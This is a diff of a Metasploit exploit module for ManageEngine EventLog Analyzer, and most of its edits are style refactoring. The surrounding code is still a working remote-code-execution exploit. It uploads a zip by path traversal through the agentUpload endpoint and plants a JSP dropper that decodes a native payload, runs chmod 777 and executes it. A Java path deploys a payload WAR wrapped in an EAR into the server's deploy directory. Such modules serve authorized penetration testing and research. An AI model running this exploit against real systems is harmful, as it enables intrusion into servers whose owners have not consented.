@@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultOptions' => { 'WfsDelay' => 5 },
         'Privileged' => false, # Privileged on Windows but not on Linux targets
-        'Platform' => %w{java linux win},
         'Targets' => [
           [ 'Automatic', {} ],
           [
@@ -84,25 +83,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_version
     res = send_request_cgi({
-      'uri' => normalize_uri("event/index3.do"),
+      'uri' => normalize_uri('event/index3.do'),
       'method' => 'GET'
     })
 
-    if res and res.code == 200
-      if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
-        return $1
-      end
+    if res and res.code == 200 && (res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/)
+      return ::Regexp.last_match(1)
     end
 
-    return "0"
+    return '0'
   end
 
   def check
     version = get_version
-    if version >= "7" and version <= "9"
+    if version >= '7' and version <= '9'
       # version 7 to < 8.1 detection
       res = send_request_cgi({
-        'uri' => normalize_uri("event/agentUpload"),
+        'uri' => normalize_uri('event/agentUpload'),
         'method' => 'GET'
       })
       if res and res.code == 405
@@ -111,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # version 8.1+ detection
       res = send_request_cgi({
-        'uri' => normalize_uri("agentUpload"),
+        'uri' => normalize_uri('agentUpload'),
         'method' => 'GET'
       })
       if res and res.code == 405 and version == 8
@@ -133,15 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote
     zip.add_file(target_path, payload)
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4 + rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4 + rand(4))}.zip\"")
+    post_data.add_part(zip.pack, 'application/zip', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(rand(4..7))}\"; filename=\"#{Rex::Text.rand_text_alpha(rand(4..7))}.zip\"")
 
     data = post_data.to_s
 
     if is_payload
-      print_status("Uploading payload...")
+      print_status('Uploading payload...')
     end
     res = send_request_cgi({
-      'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
+      'uri' => (@my_target == targets[1] ? normalize_uri('/event/agentUpload') : normalize_uri('agentUpload')),
       'method' => 'POST',
       'data' => data,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
@@ -149,9 +146,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res and res.code == 200 and res.body.empty?
       if is_payload
-        print_good("Payload uploaded successfully")
+        print_good('Payload uploaded successfully')
       end
-      register_files_for_cleanup(target_path.gsub("../../", "../"))
+      register_files_for_cleanup(target_path.gsub('../../', '../'))
       return true
     else
       return false
@@ -161,19 +158,19 @@ class MetasploitModule < Msf::Exploit::Remote
   def pick_target
     return target if target.name != 'Automatic'
 
-    print_status("Determining target")
+    print_status('Determining target')
 
     version = get_version
 
-    if version == "7"
+    if version == '7'
       return targets[1]
     end
 
-    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    os_finder_payload = %{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
     jsp_name = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
-    target_dir = "../../webapps/event/"
-    if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
-      if version == "8"
+    target_dir = '../../webapps/event/'
+    if !create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
+      if version == '8'
         # Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
         return targets[1]
       end
@@ -199,31 +196,31 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_jsp_payload
-    opts = { :arch => @my_target.arch, :platform => @my_target.platform }
-    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
+    opts = { arch: @my_target.arch, platform: @my_target.platform }
+    exploit_regenerate_payload(@my_target.platform, @my_target.arch)
     exe = generate_payload_exe(opts)
     base64_exe = Rex::Text.encode_base64(exe)
 
-    native_payload_name = rand_text_alpha(rand(6) + 3)
+    native_payload_name = rand_text_alpha(rand(3..8))
     ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
 
-    var_raw = rand_text_alpha(rand(8) + 3)
-    var_ostream = rand_text_alpha(rand(8) + 3)
-    var_buf = rand_text_alpha(rand(8) + 3)
-    var_decoder = rand_text_alpha(rand(8) + 3)
-    var_tmp = rand_text_alpha(rand(8) + 3)
-    var_path = rand_text_alpha(rand(8) + 3)
-    var_proc2 = rand_text_alpha(rand(8) + 3)
+    var_raw = rand_text_alpha(rand(3..10))
+    var_ostream = rand_text_alpha(rand(3..10))
+    var_buf = rand_text_alpha(rand(3..10))
+    var_decoder = rand_text_alpha(rand(3..10))
+    var_tmp = rand_text_alpha(rand(3..10))
+    var_path = rand_text_alpha(rand(3..10))
+    var_proc2 = rand_text_alpha(rand(3..10))
 
     if @my_target['Platform'] == 'linux'
-      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      chmod = %Q|
+      var_proc1 = Rex::Text.rand_text_alpha(rand(3..10))
+      chmod = %|
       Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
       Thread.sleep(200);
       |
 
-      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      cleanup = %Q|
+      var_proc3 = Rex::Text.rand_text_alpha(rand(3..10))
+      cleanup = %|
       Thread.sleep(200);
       Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
       |
@@ -232,7 +229,7 @@ class MetasploitModule < Msf::Exploit::Remote
       cleanup = ''
     end
 
-    jsp = %Q|
+    jsp = %|
     <%@page import="java.io.*"%>
     <%@page import="sun.misc.BASE64Decoder"%>
     <%
@@ -258,8 +255,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     jsp = jsp.gsub(/\n/, '')
     jsp = jsp.gsub(/\t/, '')
-    jsp = jsp.gsub(/\x0d\x0a/, "")
-    jsp = jsp.gsub(/\x0a/, "")
+    jsp = jsp.gsub(/\x0d\x0a/, '')
+    jsp = jsp.gsub(/\x0a/, '')
 
     return jsp
   end
@@ -272,10 +269,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     jsp_name = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
-    target_dir = "../../webapps/event/"
+    target_dir = '../../webapps/event/'
 
     jsp_payload = generate_jsp_payload
-    if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
+    if !create_zip_and_upload(jsp_payload, target_dir + jsp_name)
       fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     end
 
@@ -285,32 +282,32 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit_java
     # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
     # Fail if this is the case and ask the user to select an appropriate payload.
-    if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
+    if @my_target['Platform'] == 'java' and !(payload_instance.name =~ /Java/)
       fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
     end
 
-    target_dir = "../../server/default/deploy/"
+    target_dir = '../../server/default/deploy/'
 
     # First we generate the WAR with the payload...
     war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    war_payload = payload.encoded_war({ :app_name => war_app_base })
+    war_payload = payload.encoded_war({ app_name: war_app_base })
 
     # ... and then we create an EAR file that will contain it.
     ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
+    app_xml = %(<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + '.war'}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>)
 
     # Zipping with CM_STORE to avoid errors while decompressing the zip
     # in the Java vulnerable application
     ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
-    ear_file.add_file(war_app_base + ".war", war_payload.to_s)
-    ear_file.add_file("META-INF/application.xml", app_xml)
-    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
+    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
+    ear_file.add_file('META-INF/application.xml', app_xml)
+    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
 
-    if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
+    if !create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
       fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     end
 
-    print_status("Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
+    print_status('Waiting ' + datastore['SLEEP'].to_s + ' seconds for EAR deployment...')
     sleep(datastore['SLEEP'])
     return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
   end
@@ -323,7 +320,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @my_target = pick_target
     if @my_target.nil?
-      print_error("Unable to select a target, we must bail.")
+      print_error('Unable to select a target, we must bail.')
       return
     else
       print_status("Selected target #{@my_target.name}")
@@ -335,7 +332,7 @@ class MetasploitModule < Msf::Exploit::Remote
       exploit_path = exploit_native
     end
 
-    print_status("Executing payload...")
+    print_status('Executing payload...')
     send_request_cgi({
       'uri' => normalize_uri(exploit_path),
       'method' => 'GET'
